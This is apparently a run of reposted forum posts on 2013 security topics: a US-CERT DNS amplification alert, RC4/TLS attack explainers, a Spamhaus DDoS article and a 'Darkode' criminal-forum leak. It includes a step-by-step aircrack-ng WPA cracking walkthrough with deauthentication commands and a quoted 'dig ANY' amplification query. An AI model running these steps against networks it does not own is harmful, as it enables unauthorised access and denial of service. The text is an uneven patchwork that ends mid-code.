There is currently an experimental feature available as a set of patches for BIND9 that allows an administrator to restrict the number of responses per second being sent from the name server [12]. This is intended to reduce the effectiveness of DNS amplification attacks by reducing the volume of traffic coming from any single resolver.

BIND9
On BIND9 implementations running the RRL patches, add the following lines to the options block of the authoritative views [13]:

    rate-limit {
        responses-per-second 5;
        window 5;
    };

Microsoft DNS Server
This option is currently not available for Microsoft DNS Server.

References
* [1] Open DNS Resolver Project
* [2] The Measurement Factory, "List Open Resolvers on Your Network"
* [3] The Measurement Factory, "Open Resolver Test"
* [4] The Measurement Factory, "Open Resolvers for Each Autonomous System"
* [5] "DNSInspect," DNSInspect.com
* [6] RFC 1034: DOMAIN NAMES - CONCEPTS AND FACILITIES
* [7] BCP 38: Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing
* [8] Chapter 3. Name Server Configuration
* [9] Disable recursion on the DNS server
* [10] Chapter 7. BIND 9 Security Considerations
* [11] Configure a DNS Server to Use Forwarders
* [12] DNS Response Rate Limiting (DNS RRL)
* [13] Response Rate Limiting in the Domain Name System (DNS RRL)

Revision History
* March 29, 2013: Initial release

Relevant URL(s):
<http://openresolverproject.org/>
<http://dns.measurement-factory.com/cgi-bin/openresolverquery.pl>
<http://dns.measurement-factory.com/cgi-bin/openresolvercheck.pl>
<http://dns.measurement-factory.com/surveys/openresolvers/ASN-reports/latest.html>
<http://www.dnsinspect.com/>
<http://tools.ietf.org/html/rfc1034>
<http://tools.ietf.org/html/bcp38>
<http://ftp.isc.org/isc/bind9/cur/9.9/doc/arm/Bv9ARM.ch03.html#id2567992>
<http://technet.microsoft.com/en-us/library/cc787602.aspx>
<http://ftp.isc.org/isc/bind9/cur/9.9/doc/arm/Bv9ARM.ch07.html#Access_Control_Lists>
<http://technet.microsoft.com/en-us/library/cc754941.aspx>
<http://ss.vix.su/~vixie/isc-tn-2012-1.txt>
<http://www.redbarn.org/dns/ratelimits>

____________________________________________________________________
Produced by US-CERT, a government organization.
____________________________________________________________________

This product is provided subject to this Notification: http://www.us-cert.gov/privacy/notification/
Privacy & Use policy: http://www.us-cert.gov/privacy/
This document can also be found at http://www.us-cert.gov/ncas/alerts/TA13-088A
For instructions on subscribing to or unsubscribing from this mailing list, visit http://www.us-cert.gov/mailing-lists-and-feeds/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iQEVAwUBUVXuq3dnhE8Qi3ZhAQIBXAf+LICtxQHGu5j7x8NAFG+tTSWrjducZ37v
oWhQuSsXp9XjwAN1RdXOZRpX2Sbp5b1bVZ+FfjdPljoRVpoRksuBu5qOfzathZEP
3aRA7O0Kffuk2ofCsn8I9nWOas7bZa9gO8hGan4ORjEJLt4OWFtPW+2aWfDKY72x
lcky1Ms6Z1TGkCTgJLuoUXXmGg8JQJqvRfkc7VAY4ttpJV1/DtpMIZyf2Hbr4inp
ClnGYi64ukzu38kYkQ33u3oPKjYX8bwWKAZRnpQAcHO8ddswKre7Cz2Ar5tTNluY
0/nzEAx6BVAKgntp5NUJ8y55ej+RyEQiCpBAkhE8xImmxAUPJ7AiMw==
=FVTl
-----END PGP SIGNATURE-----

Source: CERT: Alert TA13-088A: DNS Amplification Attacks
  10. Salted Hash Generator is a FREE all-in-one tool to generate salted hashes for popular hash types, including the MD5 and SHA1 families.

Here are the currently supported hash types:
* LM
* NTLM
* MD5 family (MD2, MD4, MD5)
* SHA1 family (SHA1, SHA256, SHA384, SHA512)
* RIPEMD160

For each type, it generates hashes for various combinations of password and salt:
* Password only
* Password+Salt
* Salt+Password

Finally, you can save the generated hash list to an HTML/XML/TEXT file. It is fully portable and works on all platforms from Windows XP to Windows 8.

Features
* Generate salted hashes for popular algorithms including MD5, SHA256, LM, NTLM
* Create hashes for every combination of password and salt
* Directly copy the selected hash from the list via the right-click menu option
* Save the generated hash list to an HTML/TEXT/XML file
* Simple, easy-to-use GUI interface
* Installer for local installation and un-installation
* Fully portable tool, can be run anywhere

Screenshot 1: Salted Hash Generator generating hashes for various password and salt combinations.
Screenshot 2: HTML report of the generated hash list.

Download: http://securityxploded.com/download.php#saltedhashgenerator
Source: Salted Hash Generator : All-in-one Tool to Generate Salted Hash for MD5/SHA1/SHA256/SHA512/LM/NTLM | www.SecurityXploded.com
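For the subset of these algorithms available in Python's standard hashlib (the tool itself also covers LM, NTLM, MD2, MD4, and RIPEMD160, which hashlib does not portably provide), the three password/salt combinations can be sketched as follows; the function and variable names are illustrative, not taken from the tool:

```python
import hashlib

ALGORITHMS = ["md5", "sha1", "sha256", "sha512"]

def salted_hashes(password, salt):
    """Hash the three combinations the tool lists — password only,
    password+salt, salt+password — under each supported algorithm."""
    combos = {
        "password": password,
        "password+salt": password + salt,
        "salt+password": salt + password,
    }
    return {
        alg: {name: hashlib.new(alg, data.encode()).hexdigest()
              for name, data in combos.items()}
        for alg in ALGORITHMS
    }
```

Note that concatenation order matters: password+salt and salt+password produce completely different digests, which is why the tool enumerates both.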
  11. [h=3]How To Crack A WPA Key With Aircrack-ng[/h]

With the increase in popularity of wireless networks and mobile computing, an overall understanding of common security issues has become not only relevant, but very necessary for both home users and IT professionals alike. This article is aimed at illustrating current security flaws in WPA/WPA2. Successfully cracking a wireless network assumes some basic familiarity with networking principles and terminology. To successfully crack WPA/WPA2, you first need to be able to set your wireless network card in "monitor" mode to passively capture packets without being associated with a network. One of the best free utilities for monitoring wireless traffic and cracking WPA-PSK/WPA2 keys is the aircrack-ng suite, which we will use throughout this article. It has both Linux and Windows versions (provided your network card is supported under Windows).

The network adapter I am going to use for WPA/WPA2 cracking is the Alfa AWUS036H; the OS is BackTrack 5 R2.

Step 1: Setting up your network device
To capture network traffic without being associated with an access point, we need to set the wireless network card in monitor mode. To do that, type:

Command # iwconfig (to find all wireless network interfaces and their status)
Command # airmon-ng start wlan0 (to set monitor mode; you may have to substitute wlan0 for your own interface name)

Step 2: Reconnaissance
This step assumes you've already set your wireless network interface in monitor mode. It can be checked by executing the iwconfig command. The next step is finding available wireless networks and choosing your target:

Command # airodump-ng mon0 (monitors all channels, listing available access points and associated clients within range)

Step 3: Capturing Packets
To capture data into a file, we use the airodump-ng tool again, with some additional switches to target a specific AP and channel.
Assuming our wireless interface is mon0, and we want to capture packets on channel 1 into a capture file called data:

Command # airodump-ng -c 1 --bssid AP_MAC -w data mon0

Step 4: De-Authentication Technique
To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. You may also try to deauthenticate an associated client to speed up the process of capturing a handshake, using:

Command # aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (where MAC_AP is the MAC address of the access point and MAC_Client is the MAC address of an associated client)

So, now we have successfully acquired a WPA handshake.

Step 5: Cracking WPA/WPA2
Once you have captured a four-way handshake, you also need a large, relevant dictionary file (commonly known as a wordlist) containing common passphrases:

Command # aircrack-ng -w wordlist capture_file.cap (where wordlist is your dictionary file, and capture_file.cap is a capture file with a valid WPA handshake)

Cracking WPA-PSK and WPA2-PSK only requires a captured handshake. From there, the offline dictionary attack on that handshake is the slow part, and it will only succeed with weak passphrases and good dictionary files. Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance to stumble on a combination of common numerals or dictionary words. Still, a weak, short, common, or human-readable passphrase can be broken within a few minutes using an offline dictionary attack.

About The Author
Shaharyar Shafiq is doing a Bachelors in Computer Engineering at Hamdard University. He has done C|PTE (Certified Penetration Testing Engineer) and is interested in network penetration testing and forensics.

Source: How To Crack A WPA Key With Aircrack-ng | Learn How To Hack - Ethical Hacking and security tips
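Under the hood, the dictionary attack in Step 5 works because WPA/WPA2-PSK derives its pairwise master key (PMK) from the passphrase and the SSID via PBKDF2-HMAC-SHA1 with 4096 iterations. The sketch below illustrates that derivation in Python; note that aircrack-ng actually verifies candidates against the MIC in the captured four-way handshake rather than comparing PMKs directly, so this is a simplified model with illustrative names:

```python
import hashlib

def wpa_pmk(passphrase, ssid):
    """WPA/WPA2-PSK pairwise master key:
    PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def dictionary_attack(target_pmk, ssid, wordlist):
    """Derive a PMK for each candidate passphrase; return the hit or None."""
    for word in wordlist:
        if wpa_pmk(word, ssid) == target_pmk:
            return word
    return None
```

The 4096 PBKDF2 iterations per candidate are exactly why cracking takes hours on a CPU and why wordlist quality matters more than raw speed.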
  12. HTTPS Cracked! SSL/TLS Attacked And Exploited

People who blog about ethical hacking have a very sincere relationship with cryptographers. They (the cryptographers) keep bringing something delightful into the everyday nonsense, and we blabber about their accomplishments until the subject is squishy and old - this love goes far beyond what can be comprehended by normal folk. No offence.

It seems they have swept us off our feet again, and this time around they are flaunting the big guns. Cryptographers have targeted SSL/TLS and done some serious damage to HTTPS. TLS as a whole did not take a fatal blow, since the attack requires capturing millions or billions of connections containing the same plaintext. But it highlights a major issue with the RC4 encryption algorithm.

RC4 is a symmetric cipher: it uses the same key for encryption and decryption. Public-key operations with a public/private key pair are comparatively slow, so TLS takes a hybrid approach: a connection is set up using public/private key pairs, and once established, data is encrypted with a symmetric cipher such as AES, DES, Triple-DES, Blowfish, or RC4.

RC4 has been advised against many times in the past, but it is also a fact that it carries about half of all TLS traffic. The attack on this part of TLS was carried out by AlFardan, Bernstein, Paterson, Poettering, and Schuldt (AlFBPPS). According to the Sophos Naked Security team:

    RC4 is a stream cipher, so it is basically a keyed cryptographic pseudo-random number generator (PRNG). It emits a stream of cipher bytes that are XORed with your plaintext to produce the encrypted ciphertext. To decrypt the ciphertext, you initialise RC4 with the same key, and XOR the ciphertext with the same stream of cipher bytes.
    XORing twice with the same value "cancels out", because k XOR k = 0, and p XOR 0 = p.

RC4 generates statistically anomalous output at the start of each stream of cipher bytes; it is therefore not a high-quality cryptographic PRNG. This phenomenon was first observed by Itsik Mantin and Adi Shamir in 2001. They noticed that in the second output byte, the value zero turned up twice as often as it should - once every 128 keys on average, instead of once every 256. This led to an attack on WEP, which was then replaced by WPA.

AlFBPPS have taken this attack further than anyone else, "producing statistical tables for the probability of every output byte (0..255) for each of the first 256 output positions in an RC4 cipher stream, for a total of 65,536 (256x256) measurements."

According to the Naked Security team:

    By using a sufficiently large sample size of differently-keyed RC4 streams, they achieved results with sufficient precision to determine that almost every possible output was biased in some way. (The probability tables for a few of the output positions, which are numbered from 1 to 256, are shown in the original article.) The authors realised that if you could produce TLS connections over and over again that contained the same data at a known offset inside the first 256 bytes (for example, an HTTP request with a session cookie at the start of the headers), you could use their probability tables to guess the cipher stream bytes for those offsets.

Here's a brief description of how it works, from the Naked Security team:

    Imagine that you know that the 48th plaintext byte, P48, is always the same, but not what it is. You provoke millions of TLS connections containing that fixed-but-unknown P48; in each connection, which will be using a randomly-chosen session key, P48 will end up encrypted with a pseudo-random cipher byte, K48, to give a pseudo-random ciphertext byte, C48.
    And you sniff the network traffic so you capture millions of different samples of C48. Now imagine that one value for C48 shows up more than 1% (1.01 times) more frequently than it ought to. We'll refer to this skewed value of C48 as C'. From the probability table for K48, you would guess that the cipher byte used for encrypting P to produce C' must have been 208 (0xD0), since K48 takes the value 208 more than 1% too often. In other words, C' must be P XOR 208, so that P must be C' XOR 208, and you have recovered the 48th byte of plaintext.

    The guesswork gets a little harder for cipher stream offsets where the skew in frequency distribution is less significant, but it's still possible, given sufficiently many captured TLS sessions.

AlFBPPS measured how accurate their plaintext guesses were for varying numbers of TLS sessions, and the results were worrying, if not actually scary. However, given the huge number of TLS sessions required, The Register's provocative URL theregister.co.uk/tls_broken might be going a bit far. Initiating 2^32 (about 4 billion), or even 2^28 (about 268 million), TLS sessions, and then sniffing and post-processing the results to extract a session cookie is unlikely to be a practicable attack any time soon. If nothing else, the validity of the session cookie might reasonably be expected to be shorter than the time taken to provoke hundreds of millions of redundant TLS connections.

On the other hand, the advice to avoid RC4 altogether because of its not-so-random PRNG can't be written off as needlessly conservative. If you can, ditch RC4 from the set of symmetric ciphers your web browser is willing to use and your web servers will accept. Go for AES-GCM instead. GCM, or Galois/Counter Mode, is a comparatively new way of using block ciphers that gives you encryption and authentication all in one, which not only avoids the risky RC4 cipher, but neatly bypasses the problems exposed in the Lucky 13 attack, too.

Cheers!
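The Mantin-Shamir bias mentioned above is easy to reproduce empirically. The following self-contained Python sketch (illustrative code, not the AlFBPPS tooling) implements RC4 and counts how often the second keystream byte is zero across many random keys; an unbiased PRNG would give about 1 in 256, but RC4 gives roughly 1 in 128:

```python
import random

def rc4_keystream(key, n):
    """Standard RC4: key schedule (KSA), then n bytes of keystream (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    i = j = 0
    out = []
    for _ in range(n):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return out

def second_byte_zero_count(num_keys, seed=1):
    """Count how often the second keystream byte is zero over random keys.

    Mantin-Shamir (2001): P[Z2 = 0] is about 1/128, twice the uniform 1/256.
    """
    rng = random.Random(seed)
    zeros = 0
    for _ in range(num_keys):
        key = bytes(rng.randrange(256) for _ in range(16))
        if rc4_keystream(key, 2)[1] == 0:
            zeros += 1
    return zeros
```

The AlFBPPS attack generalizes this one measurement: instead of a single bias at a single position, it tabulates the frequencies of all 256 byte values at each of the first 256 keystream positions.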
About the Author: This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of the RHA team.

Source: HTTPS Cracked! SSL/TLS Attacked And Exploited | Learn How To Hack - Ethical Hacking and security tips
  13. [h=3]New RC4 Attack[/h]

This is a really clever attack on the RC4 encryption algorithm as used in TLS.

    We have found a new attack against TLS that allows an attacker to recover a limited amount of plaintext from a TLS connection when RC4 encryption is used. The attacks arise from statistical flaws in the keystream generated by the RC4 algorithm which become apparent in TLS ciphertexts when the same plaintext is repeatedly encrypted at a fixed location across many TLS sessions.

The attack is very specialized:

* The attack is a multi-session attack, which means that we require a target plaintext to be repeatedly sent in the same position in the plaintext stream in multiple TLS sessions.
* The attack currently only targets the first 256 bytes of the plaintext stream in sessions. Since the first 36 bytes of plaintext are formed from an unpredictable Finished message when SHA-1 is the selected hashing algorithm in the TLS Record Protocol, these first 36 bytes cannot be recovered. This means that the attack can recover 220 bytes of TLS-encrypted plaintext.
* The number of sessions needed to reliably recover these plaintext bytes is around 2^30, but already with only 2^24 sessions, certain bytes can be recovered reliably.

Is this a big deal? Yes and no. The attack requires the identical plaintext to be repeatedly encrypted. Normally, this would make for an impractical attack in the real world, but HTTP messages often have stylized headers that are identical across a conversation -- for example, cookies. On the other hand, those are the only bits that can be decrypted.

Currently, this attack is pretty raw and unoptimized -- so it's likely to become faster and better. There's no reason to panic here. But let's start to move away from RC4 to something like AES.

There are lots of press articles on the attack.

Source: Schneier on Security: New RC4 Attack
  14. [h=3]Darkode leak[/h]

And you can thank Nassef.

Internal Revenue Service
I don't know if it's you who did this shit:
upaskitv1.org
xylibox.biz
krebsonsecurity.biz
upaskitversion1.biz
stevenk.biz
briankrebs.biz
upaskit1.biz
researchsecurity.biz
securityresearch.biz
amatrosov.biz
But since you seem related to this, I took an interest.

Also, I can thank you for this: I got your builder from Darkode and made my keygen. I also grabbed a lot of other things, but that's another story. Nassef is also involved in POS sniffing, trying to deal with carder shops. But I will not talk about Nassef here; this post is about 'darkode'.

This forum is known to be an 'elite' community of black hats; there are a lot of (in)famous actors inside. Some are already jailed and some are still in business.

Darkode login, with a really gay captcha. And about the captcha: they added it because of me. I don't live in Lyon and I never walked with you; get a life, man. About the captcha, something worries me: it seems he sniffs passwords. I'm sure the login form is even backdoored to record the passwords of his users. Also, this is not my bruteforce; when I bruteforce, it's more hardcore than this shit.

Darkode, for a short period, even required a private SSL cert to keep out unauthorized people. They removed it for an unknown reason (probably because the skid wave ended); the admin of DK gave invites to everyone recently (I even received one without doing anything; I'm not sure if it's black-hat humor or if someone posed on DK and gave them my mail). Anyway, I don't need this invitation.

Now, let's have a look at who's inside darkode...
symlink:
Paunch:
*******:
bx1:
BestAV:
Severa:
Exmanoize:
alexudakov:
Carberp J.P.MORGAN
Even Slavik, according to the admin:

Some members listed here are already jailed, e.g. bx1 and *******.
A member showing off the money he made with SpyEye ($11,404.34 USD):
Another DK member who laundered 20k LR with members of this forum:
Sweet Orange stats of one guy:
The coder of CrimePack, angry about the leak:
Presentation of cr33k, coder of the "Open Source Exploit Kit":
"I skimmed Diebolds", "as a mule I cashed out WU payments with fake IDs" - there are some nice people on darkode...
Presentation of the Egypack exploit kit:
Business advice from a darkode admin:

Now, about darkode, you will say "wow, this board is hardcore", but no... not really. Maybe this forum was cool in 2009 with Gribodemon and such, but these days it looks like HackForums. And speaking of HackForums, even the admins are on it:

mafi (www.hackforums.net/member.php?action=profile&uid=82912) - selling CrimePack:
sp3cial1st (hackforums.net/member.php?action=profile&uid=666599) - recruiting HackForums people for darkode:
Fubar (hackforums.net/member.php?action=profile&uid=83826) - HF Leet:
(and they are all admins on darkode)

Profile of mafi on malwareview (a kernelmode.info clone, but with idiots): oh wow, they even use HackForums products and resell them. ngrbot - is this the scene?

Also, remember this? Maybe in another post I will explain the drama between uNkn0wn and darkode...

At darkode they would probably call 2 or 3 screenshots a 'leak', so... I took around ~4500 screenshots. I know it can be hard for white hats to get into a community like darkode to do research. So enjoy 763 MB of screenshots - not a full dump, but almost. I have a full dump of course, with each thread and page fetched via wget, but I'm keeping that version for the law-enforcement guys (some of them have already had the darkode account and my regular dumps in hand for a long time, just saying...). Anyway, even with this 'public' screenshot dump, anyone has enough to launch indictments and such. Oh... it's really fun, dude.

Also took a screenshot of maza for the glory...
(I must admit I miss the malware of 2010/2011.)

Gribo says that Slavik has completely left the business and transferred everything related to Zeus 2.0 to him, so he can continue work on the bot, including customer technical support. Slavik said to tell everyone that he was happy to work with all the guys, and other stuff.

You can download the public dump here:
http://temari.fr/darkode.rar
http://trollkore.fr/darkode.rar
http://yandere.fr/darkode.rar
After 24 hours I will remove the archive from my server, so fetch it fast.
Multiupload.nl - upload your files to multiple file hosting sites!

To conclude: this post about darkode is exceptional; I usually leave these forums alone and don't blog about them. I receive a lot of emails asking me to pay attention to these boards, but over the past few days, for an unknown reason, some guys from darkode have started to seriously annoy me (adding me on Skype and mailing me shit), so this is just my response to them.

cb0f0ef62585ef7484d3582f3caf4ccf

Have a nice day, and some good advice: stay away from darkode if you don't want someone knocking at your door. Also, don't ask me to do the same type of post about mazafaka or other forums (I can already see the mails coming). If you want some info, http://trojanforge.com/showthread.php?t=2391 is a good start; I will not help.

Posted by Steven K at 01:22

Source: XyliBox: Darkode leak
  15. [h=1]How the Spamhaus DDoS attack could have been prevented[/h]

Internet engineers have known for at least 13 years how to stop major distributed denial of service attacks. But thanks to a combination of economics and inertia, attacks continue. Here's why.

by Declan McCullagh
March 29, 2013 4:00 AM PDT

Nearly 13 years ago, the wizardly band of engineers who invented and continue to defend the Internet published a prescient document they called BCP38, which described ways to thwart the most common forms of distributed denial-of-service attack. BCP38, short for Best Current Practice #38, was published soon after debilitating denial-of-service attacks crippled eBay, Amazon, Yahoo, and other major sites in February 2000.

If those guidelines to stop malcontents from forging Internet addresses had been widely adopted by the companies, universities, and government agencies that operate the modern Internet, this week's electronic onslaught targeting Spamhaus would have been prevented. But they weren't. So a 300-gigabit-per-second torrent of traffic flooded into the networks of companies including Spamhaus, Cloudflare, and key Internet switching stations in Amsterdam, Frankfurt, and London. It was like 1,000 cars trying to crowd onto a highway designed for 100 vehicles at a time. Cloudflare dubbed it, perhaps a bit too dramatically, the attack "that almost broke the Internet."

BCP38 outlined how providers can detect and then ignore the kind of forged Internet addresses that were used in this week's DDoS attack. Since its publication, though, adoption has been haphazard. Hardware generally needs to be upgraded. Employees and customers need to be trained. Routers definitely need to be reconfigured. The cost for most providers, in other words, has exceeded the benefits.

"There's an asymmetric cost-benefit here," said Paul Vixie, an engineer and Internet pioneer who serves on the Internet Corporation for Assigned Names and Numbers' security advisory board.
That's because, Vixie said, the provider that takes the time to secure its networks makes all the investment, while other providers "get all the reward."

BCP38 is designed to verify that someone claiming to be located in a certain corner of the Internet actually is there. It's a little like a rule that the Postal Service might impose if there's a deluge of junk mail with fake return addresses originating from a particular ZIP code. If you're sending a letter from San Francisco, the new rule might say, your return label needs to sport a valid northern California address, not one falsely purporting to originate in Hong Kong or Paris. It might annoy the occasional tourist, but it would probably work in most cases.

This week's anti-Spamhaus onslaught relied on attackers spoofing Internet addresses, then exploiting a feature of the domain name system (DNS) called open recursors or open recursive resolvers. Because of a quirk in the design of one of the Internet's workhorse protocols, these can amplify traffic over 30 times and overwhelm all but the best-defended targets.

The countermeasures

Preventing spoofing through BCP38 will prevent this type of amplification attack. "There is no way to exploit DNS servers of any type, including open recursors, to attack any third party without the ability to spoof traffic," said Arbor Networks' Roland Dobbins. "The ability to spoof traffic is what makes the attack possible. Take away the ability to spoof traffic, and DNS servers may no longer be abused to send floods of traffic to DDoS third parties."

Other countermeasures exist. One of them is to lock down open recursive resolvers by allowing them to be used only by authorized users. There are about 27 million DNS resolvers on the global Internet. Of those, a full 25 million "pose a significant threat" and need to be reconfigured, according to a survey conducted by the Open Resolver Project. Reprogramming them all is the very definition of a non-trivial task.
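The BCP38 idea is conceptually simple: accept a packet from a customer port only if its source address belongs to the prefixes assigned to that port, exactly like the postal "valid return address" rule above. Here is a toy Python model of that check (illustrative only; real deployments implement it in router ACLs or uRPF, and the port names and prefixes below are made-up documentation ranges):

```python
import ipaddress

# Hypothetical mapping of customer-facing ports to their assigned prefixes.
CUSTOMER_PREFIXES = {
    "port-1": [ipaddress.ip_network("203.0.113.0/24")],
    "port-2": [ipaddress.ip_network("198.51.100.0/25"),
               ipaddress.ip_network("2001:db8::/32")],
}

def permit_ingress(port, src_ip):
    """BCP38-style check: forward only packets whose source address falls
    inside a prefix assigned to the port they arrived on."""
    src = ipaddress.ip_address(src_ip)
    return any(src in net for net in CUSTOMER_PREFIXES.get(port, []))
```

A packet claiming a victim's address as its source would fail this check at the first hop, which is why universal BCP38 deployment would stop spoofing-based amplification outright.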
"You could stop this attack in either of two ways," said Matthew Prince, co-founder and CEO of CloudFlare, which helped defend against this week's attack. "One, shut down the open resolvers, or two, get all the networks to implement BCP38. The attackers need both in order to generate this volume of attack traffic."

Alternatively, networks don't need to lock down open resolvers completely. Google, which operates one of the world's largest networks, has adopted an innovative rate-limiting technique. It describes rate-limiting as a way to "protect any other systems against amplification and traditional distributed DoS (botnet) attacks that could be launched from our resolver servers." But few companies, universities, individuals, and assorted network operators are going to be as security-conscious as Mountain View's teams of very savvy engineers.

Worse yet, even if open recursive resolvers are closed to the public, attackers can switch to other services that rely on UDP, the Internet's User Datagram Protocol. Network management protocols and time-synchronization protocols -- all designed for a simpler, more innocent era -- can also be pressed into service as destructive traffic reflectors. The reflection ratios may not be as high as 1:30, but they're still enough to interest someone with malicious intent. Arbor Networks has spotted attacks based on traffic amplification from SNMP, a network management protocol, that exceed 30 gigabits per second. Closing open DNS resolvers won't affect attacks that use SNMP to club unwitting targets. Which is, perhaps, the best argument for BCP38.

The most common way to curb spoofing under BCP38 is with a technique called Unicast Reverse Path Forwarding (uRPF) to try to weed out unwanted traffic. But that needs to be extended to nearly every customer of a provider or network operator, a daunting undertaking.
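Rate limiting of the kind Google describes is commonly built on a token bucket: each client source gets a bucket that refills at a fixed rate, and each answered query spends one token, so short bursts pass while sustained reflection floods are throttled. A minimal sketch follows (an assumed, generic design for illustration, not Google's actual implementation):

```python
import time

class TokenBucket:
    """Per-client limiter: allows `burst` queries at once, refills at `rate`/sec."""

    def __init__(self, rate, burst, now=None):
        self.rate = float(rate)
        self.burst = float(burst)
        self.tokens = float(burst)
        self.last = time.monotonic() if now is None else now

    def allow(self, now=None):
        now = time.monotonic() if now is None else now
        # Refill proportionally to elapsed time, capped at the burst size.
        self.tokens = min(self.burst, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False  # over the limit: drop or deprioritize this query
```

A resolver would keep one bucket per client source address; a spoofed flood aimed at a victim address exhausts that address's bucket almost immediately, capping the reflected traffic.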
Nick Hilliard, chief technology officer for INEX, an Internet exchange based in Dublin, Ireland, said:

    BCP38 is harder than it looks because in order to implement it properly, you need to roll out uRPF or interface [access control lists] to every single customer edge point on the internet. I.e. every DSL link, every cable modem, every VPS in a provider's cloud hosting centre and so forth. The scale of this undertaking is huge: there is lots of older (and sometimes new) equipment in production out there which either doesn't support uRPF (in which case you can usually write access filters to compensate), or which supports uRPF but badly (i.e. the kit might support it for IPv4 but not IPv6). If you're a network operator and you can't use uRPF because your kit won't support it, installing and maintaining individual access filtering on your customer edge is impossible without good automated tools to do so, and many service providers don't have these.

Translation: It all adds up to being really hard.

Vixie, who wrote an easy-to-read description of the problem back in 2002, suggested it's a little like fire, building, and safety codes: the government "usually takes a role" forcing everyone to adopt the same standards, and roughly the same costs. Eventually, he suggests, nobody complains that their competitors are getting away without paying compliance costs.

That argument crops up frequently enough in technical circles, but it tends to be shot down just as fast. For one thing, wielding a botnet to carry out a DDoS attack is already illegal in the United States and just about everywhere else in the civilized world. And as a practical matter, botnet-managing criminals can change their tactics faster than a phalanx of professional bureaucrats in Washington, D.C. or other national capitals can respond.

INEX's Hilliard said the real answer is to change the economics to make it less profitable to carry out DDoS attacks.
When sending spam was cheap, Hilliard said, he was receiving 10,000 Viagra offers a month. But after network providers took concerted steps to crack down, "the economics changed and so did the people who were abusing the Internet, and now I get about 2,000 a month, all of which end up in my spam folder," he said. "The same thing will happen to DDoS attacks: in 10 years' time, we will have a lot more in terms of BCP38 coverage, and we won't get upset as much about the small but steady stream of 300-gigabit attacks."

Sursa: How the Spamhaus DDoS attack could have been prevented | Security & Privacy - CNET News
  16. Parsing Binary File Formats With PowerShell Authored by Matt Graeber | Site exploit-monday.com This archive includes a presentation and code samples. The presentation is called Parsing Binary File Formats with PowerShell. Download: http://packetstormsecurity.com/files/121014/powershell-parsingbinary.tgz
  17. MiniDuke - The Final Cut Bitdefender Labs analysts have taken the time to put together an in-depth look at MiniDuke, detailing everything they’ve found (so far). The new research paper covers subjects ranging from the functionality of the payload dropper, to the content of the hand-crafted phishing e-mails. It’s fresh, it’s got surprising hints as to the attackers’ identities and it’s hosted here: Download: http://labs.bitdefender.com/wp-content/uploads/downloads/2013/04/MiniDuke_Paper_Final.pdf Sursa: MiniDuke – The Final Cut | Bitdefender Labs
  18. CUDA Cracking
Presented by: Rohit Shaw, Xiarch Solutions Pvt Ltd, New Delhi

Compute Unified Device Architecture (CUDA) is a parallel computing architecture developed by Nvidia for graphics processing. CUDA is the computing engine in Nvidia graphics processing units (GPUs) that is accessible to software developers through variants of industry-standard programming languages.

Introduction: CUDA cracking means cracking passwords with the help of a graphics card's GPU, which makes password cracking much faster than on a CPU.

Building a CUDA Machine: Building a monster CUDA machine requires a large investment. First, select a motherboard that supports more than one GPU, because more GPUs mean faster password cracking. I suggest the MSI Big Bang Marshall motherboard, which supports up to 8 graphics cards. Another unique feature of this motherboard is its cross-platform GPU support: it can drive both ATI and Nvidia graphics cards at the same time. Use a quad-core processor or one of Intel's Core i-family processors for better performance. 16 GB of RAM is sufficient for this motherboard. Another important consideration is the power supply: this machine needs up to 1250 watts. Also use as many cooling fans as possible, because the graphics cards heat up intensively during cracking.

Download: www.exploit-db.com/download_pdf/24909
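The speed gap the paper describes is easy to feel even on a CPU: the loop below is the same candidate-hash-compare cycle a CUDA cracker runs, except a GPU executes it across thousands of cores in parallel. A minimal single-core sketch (the MD5 target, charset, and length limit are arbitrary choices for illustration):

```python
import hashlib
import itertools
import string
import time

def crack_md5(target_hash, charset=string.ascii_lowercase, max_len=4):
    """Exhaustively hash candidate passwords until one matches the target.
    A GPU runs this same inner loop on thousands of cores at once,
    which is the entire appeal of CUDA-based cracking."""
    for length in range(1, max_len + 1):
        for candidate in itertools.product(charset, repeat=length):
            word = "".join(candidate)
            if hashlib.md5(word.encode()).hexdigest() == target_hash:
                return word
    return None  # keyspace exhausted without a match

# rough single-core hash-rate benchmark
start = time.perf_counter()
n = 100_000
for i in range(n):
    hashlib.md5(str(i).encode()).digest()
elapsed = time.perf_counter() - start
print(f"~{n / elapsed:,.0f} MD5 hashes/sec on one CPU core")
```

A modern GPU advertises hash rates several orders of magnitude above that single-core figure, which is why the keyspace that is hopeless on a CPU becomes tractable on a multi-GPU rig.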
  19. Fun stuff: Infosec Reactions via d.
  20. Info: https://rstforums.com/blog/2013/03/30/c-quest-3/
  21. The second pair helps keep your wrist from getting strained, especially when you do chest or triceps work with a barbell, lying on your back with a close grip.
  22. Known as DNS reflection, the technique uses requests for a relatively large zone file that appear to be sent from the intended victim's network. According to CloudFlare, it initially recorded over 30,000 DNS resolvers that were tricked into participating in the attack. There are as many as 25 million of these open recursive resolvers at the disposal of attackers.

"In the Spamhaus case, the attacker was sending requests for the DNS zone file for ripe.net to open DNS resolvers. The attacker spoofed the CloudFlare IPs we'd issued for Spamhaus as the source in their DNS requests. The open resolvers responded with DNS zone file, generating collectively approximately 75Gbps of attack traffic. The requests were likely approximately 36 bytes long (e.g. dig ANY ripe.net @X.X.X.X +edns=0 +bufsize=4096, where X.X.X.X is replaced with the IP address of an open DNS resolver) and the response was approximately 3,000 bytes, translating to a 100x amplification factor."
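The figures in the quote make the attacker's leverage easy to work out; a quick sanity check of the arithmetic (byte counts taken from the quote above, so the exact ratio lands a bit under the round "100x" figure):

```python
REQUEST_BYTES = 36       # spoofed "dig ANY ripe.net ... +bufsize=4096" query
RESPONSE_BYTES = 3000    # zone data returned by the open resolver

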